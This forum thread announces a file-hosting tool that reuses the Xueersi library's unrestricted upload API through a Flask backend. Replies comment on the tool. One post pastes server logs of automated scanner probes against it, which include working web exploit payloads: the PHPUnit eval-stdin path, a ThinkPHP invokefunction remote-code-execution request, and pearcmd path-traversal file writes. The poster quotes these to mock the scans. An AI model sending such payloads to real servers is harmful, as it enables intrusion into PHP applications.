link
如题,基于学而思库uploader模块提取实现,技术栈前端原生HTML(懒的写UI,deepseek编写),后端python3+flask,未来可能开源。
请随意使用,但是不提供中转服务和上游学而思API的可用性保证,允许逆向但是没必要(因为xes-lib原生实现更好找),gcp小鸡别打(
4 个赞
link太小,差点看不到。
xes设计这个东西的时候本来就是打算主要做图床,顺便给社区python作品存资源的(url显而易见)
不过它最大的错误就是把上传方式直接放到他家库文件代码里面,而且还没有任何限制(
顺便提一句,用md5值索引文件感觉不太优雅,下一个版本可能会加保存原有文件名转发(?)
另外文件大了可能不行,实现比较粗糙并且上游API本就不支持流式处理,下一个版本可能修改
感谢分享 
感谢分享
这种破网站还有人煞费苦心地扫目录?不至于罢,,,关键是技术栈都告诉你了还在这里搞php注入:
127.0.0.1 - - [05/Jun/2025 21:18:28] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
127.0.0.1 - - [05/Jun/2025 21:18:28] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
127.0.0.1 - - [05/Jun/2025 21:18:29] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0" 404 -
127.0.0.1 - - [05/Jun/2025 21:18:29] "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.0" 404 -
127.0.0.1 - - [05/Jun/2025 21:18:29] "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.0" 404 -
127.0.0.1 - - [05/Jun/2025 21:18:29] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php HTTP/1.0" 404 -
127.0.0.1 - - [05/Jun/2025 21:18:30] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.0" 404 -
127.0.0.1 - - [05/Jun/2025 21:18:30] "GET /containers/json HTTP/1.0" 404 -